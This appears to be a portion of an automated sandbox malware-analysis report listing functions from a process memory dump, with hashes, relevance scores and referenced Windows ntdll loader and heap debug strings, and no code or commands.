                                                                                                                                                      • Opcode Fuzzy Hash: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
                                                                                                                                                      • Instruction Fuzzy Hash: 6841A035A10265DFC715CF19C484969BBEAFF86354725C66EE5059B311D732EC42CF80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DDAC0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                      • API String ID: 3446177414-1222099010
                                                                                                                                                      • Opcode ID: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
                                                                                                                                                      • Instruction ID: f19bd5dd62c6fc0db5f8b261023cc16b33072bd5ccbde0271516257a4cb5ed45
                                                                                                                                                      • Opcode Fuzzy Hash: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
                                                                                                                                                      • Instruction Fuzzy Hash: 6D3100355147CCDFD722CF28C858FA97BA9FF01768F044B99E8028B791C779A988CA11
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8B9046, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 3446177414-1194432280
                                                                                                                                                      • Opcode ID: e26063e3f05b1aa997a426d17ce9f8b320ae7ca24839c3c8c8f7ad7ed74c497e
                                                                                                                                                      • Instruction ID: c98bde17c0fa261a47899e7984c6b9e6e5bb54824f4baee5c868f2f75c61a0cd
                                                                                                                                                      • Opcode Fuzzy Hash: e26063e3f05b1aa997a426d17ce9f8b320ae7ca24839c3c8c8f7ad7ed74c497e
                                                                                                                                                      • Instruction Fuzzy Hash: 2F812BB5D002A9DBDB21DB54CC44BDEB6B9AF48710F0446EAE909B7290D7309E85DFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E4C3D, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpFindDllActivationContext, xrefs: 1E923440, 1E92346C
                                                                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 1E923466
                                                                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 1E92344A, 1E923476
                                                                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E923439
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-3779518884
                                                                                                                                                      • Opcode ID: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
                                                                                                                                                      • Instruction ID: e00536071bbb5710b84bcc47732331ff08f497dee7669940f19939fee1637492
                                                                                                                                                      • Opcode Fuzzy Hash: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
                                                                                                                                                      • Instruction Fuzzy Hash: 3D314E72E00297AFDB12DB1C889AA59B2A5FF83354F42832AD90D57EC4D7709D80C7D1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8D237A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpDynamicShimModule, xrefs: 1E91A7A5
                                                                                                                                                      • apphelp.dll, xrefs: 1E8D2382
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E91A7AF
                                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1E91A79F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                                      • Opcode ID: d4708db23695592a5202b63dac98325e3e7f7c69ddcbd7ebfb0415e3da182b1e
                                                                                                                                                      • Instruction ID: 1f1e4e0474150e321b77c28bd2b8f411c3b34d0dc6717ae0890b619ad47358da
                                                                                                                                                      • Opcode Fuzzy Hash: d4708db23695592a5202b63dac98325e3e7f7c69ddcbd7ebfb0415e3da182b1e
                                                                                                                                                      • Instruction Fuzzy Hash: C1311276A04259EBD7159F29CCC0A9E77FAFFC0B20F14026DE911AB254E7B4AD41CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8AF8B0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 3446177414-3610490719
                                                                                                                                                      • Opcode ID: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
                                                                                                                                                      • Instruction ID: 307c4f4e8f421d2bf7b35f46c5c7d3b133776947de916ac59e53f4f42b6af5c4
                                                                                                                                                      • Opcode Fuzzy Hash: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
                                                                                                                                                      • Instruction Fuzzy Hash: 1891E975604695AFC726CB29C850B6EB7AABFC4644F040B5DFA419B3C1DB34F881CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8D0AEB, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E919F2E
                                                                                                                                                      • LdrpCheckModule, xrefs: 1E919F24
                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 1E919F1C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-161242083
                                                                                                                                                      • Opcode ID: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
                                                                                                                                                      • Instruction ID: 85b598013651d358d2448a25c393deb2f12dab150e90cba5ac757a0000a11a65
                                                                                                                                                      • Opcode Fuzzy Hash: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
                                                                                                                                                      • Instruction Fuzzy Hash: F171BE74A042499FDB05DF68C890AAEB7F6FF84708F18466DE802EB355E730AD46CB50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8D9723, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-2283098728
                                                                                                                                                      • Opcode ID: 327ee4a9f29d3afaa92717f7b94d5f985897b93956a00249fa3975773f5e744c
                                                                                                                                                      • Instruction ID: 26231f69fd9affdda2d8a923c04133c5bf282a4dcbabc8451240df92e4f22833
                                                                                                                                                      • Opcode Fuzzy Hash: 327ee4a9f29d3afaa92717f7b94d5f985897b93956a00249fa3975773f5e744c
                                                                                                                                                      • Instruction Fuzzy Hash: 635103346047469BC714DF38C884A6977A3BFC4724F180B2DE556AB6D5EBB0E819CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8EC640, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 1E9280E2
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9280F3
                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 1E9280E9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1783798831
                                                                                                                                                      • Opcode ID: 2de34aacfefc48e9f657c1b94328eda0ece676b0a917078bd556cb190353ea88
                                                                                                                                                      • Instruction ID: 3deba6ef43fa002e508b819e1729657c9f121ec7db323456b1033ad7a258b6ef
                                                                                                                                                      • Opcode Fuzzy Hash: 2de34aacfefc48e9f657c1b94328eda0ece676b0a917078bd556cb190353ea88
                                                                                                                                                      • Instruction Fuzzy Hash: 4E41C3B5918395ABC711DF68DC80B9B77E9AFC5650F014B2EF948972A5EB30E800CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E9343D5, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1E934508
                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 1E934519
                                                                                                                                                      • LdrpCheckRedirection, xrefs: 1E93450F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                      • API String ID: 3446177414-3154609507
                                                                                                                                                      • Opcode ID: 80c46eede089bfe77bbfc0ffe475d33ea95d92ee51f74c400111ede1f5d1d829
                                                                                                                                                      • Instruction ID: f9baf58a8a3cb25319cb36b62dde0c12f4ec6237ce1c593a6330d4a4a365dbf9
                                                                                                                                                      • Opcode Fuzzy Hash: 80c46eede089bfe77bbfc0ffe475d33ea95d92ee51f74c400111ede1f5d1d829
                                                                                                                                                      • Instruction Fuzzy Hash: 5B41B03A6142219BCB12CF79D848A5677EBAF88752B270B7DEC9897355D730EC008F91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E935B90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Wow64 Emulation Layer
                                                                                                                                                      • API String ID: 3446177414-921169906
                                                                                                                                                      • Opcode ID: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
                                                                                                                                                      • Instruction ID: bc3b4e6b1089beb7e32d916fe1d3c012bcd337d921a61a98c7cccc1e2e8e0d6b
                                                                                                                                                      • Opcode Fuzzy Hash: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
                                                                                                                                                      • Instruction Fuzzy Hash: 7321F7B990015DBFEB029BA48D84DFF7B7DFF49299B140654FA01A2240EB30EE01DB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DEE48, Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
                                                                                                                                                      • Instruction ID: 334d5de6910d52b6bca45d495cbf0c4510ebf8ca9fd50bc3a81404120ee235bb
                                                                                                                                                      • Opcode Fuzzy Hash: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
                                                                                                                                                      • Instruction Fuzzy Hash: D9E10274D00749CFCB25CFAAC980A9DBBF6FF48314F104A6AE446A72A4D730A885DF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E92EBD0, Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 3577419014406281db00ebc80ac2a4ec9fec04ba81fc58f9f39087e88b04d607
                                                                                                                                                      • Instruction ID: 41df72a2d3e60a360b3a87d5a599b17b041d118d0044bd20ad47cdca7ce784be
                                                                                                                                                      • Opcode Fuzzy Hash: 3577419014406281db00ebc80ac2a4ec9fec04ba81fc58f9f39087e88b04d607
                                                                                                                                                      • Instruction Fuzzy Hash: CD712275E0022A9FDF06CFA4C884BEDBBB5BF48314F54462AE905BB258D734A901CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E98A04A, Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 97b14d3bf8f0da33b18e068f35ef6cc6a1af7ae86a5991a0935e4b96c11cc701
                                                                                                                                                      • Instruction ID: 10a79a7269905eea22202fb4548abb4920e13e959e3ffc25b23b305d866aa4bf
                                                                                                                                                      • Opcode Fuzzy Hash: 97b14d3bf8f0da33b18e068f35ef6cc6a1af7ae86a5991a0935e4b96c11cc701
                                                                                                                                                      • Instruction Fuzzy Hash: 3A519A7471461A9FDB49CE19C8A0E19B3E6FF8A310B144A6DD906CB724DBB9EC41CF80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E92EE56, Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 6e903f89d774a8e7cdcdf6ba1127171fa02f3473f6a769eafb0723191d390889
                                                                                                                                                      • Instruction ID: 8e0748d64d182366c6a5ca62509513fac4986041ce5f299f19474a673048847f
                                                                                                                                                      • Opcode Fuzzy Hash: 6e903f89d774a8e7cdcdf6ba1127171fa02f3473f6a769eafb0723191d390889
                                                                                                                                                      • Instruction Fuzzy Hash: B55132B2E1121A9FDF09CF95D880AEDBBB6BF88314F04822EE805BB254D7359940CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E7A4F, Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4281723722-0
                                                                                                                                                      • Opcode ID: a2b15276379ff87db1f2cf78fb4121e57a2f57ce2a9624a55964062a90362271
                                                                                                                                                      • Instruction ID: b198efc23697de7da5c5f3158354c0751314f573068ce5749adddb57e1a544b2
                                                                                                                                                      • Opcode Fuzzy Hash: a2b15276379ff87db1f2cf78fb4121e57a2f57ce2a9624a55964062a90362271
                                                                                                                                                      • Instruction Fuzzy Hash: 2F31E279E14269EFCF15DFA8D884A9DBBB1BF88720F10462AE511B7294D7355900CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8B58E0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      • Opcode ID: 0906a1972aaf8fcfcf51c48ba8caa364c05fc321963dcc55275830f10349ae8a
                                                                                                                                                      • Instruction ID: acf76b2e07ccf47a08d1daa09b3de710dd2e71b7ca9a6eb1219dade3d095b5f2
                                                                                                                                                      • Opcode Fuzzy Hash: 0906a1972aaf8fcfcf51c48ba8caa364c05fc321963dcc55275830f10349ae8a
                                                                                                                                                      • Instruction Fuzzy Hash: 8A324674D142AACFDB21CF69C844BDDBBB6BB08304F0446E9D449A7391D775AA84CFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E4B79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0$Flst
                                                                                                                                                      • API String ID: 0-758220159
                                                                                                                                                      • Opcode ID: f3ab83caccc48749af72545d14d412eaef2d758060ca0ebd567592f266a8fdfc
                                                                                                                                                      • Instruction ID: 4a34c8c51880db264d4ad472193fb63e75de21af0e0629e119e44ccb73a3efb7
                                                                                                                                                      • Opcode Fuzzy Hash: f3ab83caccc48749af72545d14d412eaef2d758060ca0ebd567592f266a8fdfc
                                                                                                                                                      • Instruction Fuzzy Hash: AC51CCB1E1068A8FCB11CF99C48475DFBF6EF85714F54C62ED4499B688E7B09981CB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8B0485, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • kLsE, xrefs: 1E8B05FE
                                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E8B0586
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                      • API String ID: 3446177414-2547482624
                                                                                                                                                      • Opcode ID: 4c9b1930d407524ce5d7e75e5ede1a0a9b05738ad0fa10574640257d1f718216
                                                                                                                                                      • Instruction ID: 520aa1bc67232efbc796ce0e24342776ac1376ec7a2ae064a2977389b5560793
                                                                                                                                                      • Opcode Fuzzy Hash: 4c9b1930d407524ce5d7e75e5ede1a0a9b05738ad0fa10574640257d1f718216
                                                                                                                                                      • Instruction Fuzzy Hash: C351D1B5A0078ADFDB24DFA9C4406EBB7F9AF44300F004A3ED5A597740E730A546CBA1
                                                                                                                                                      Uniqueness

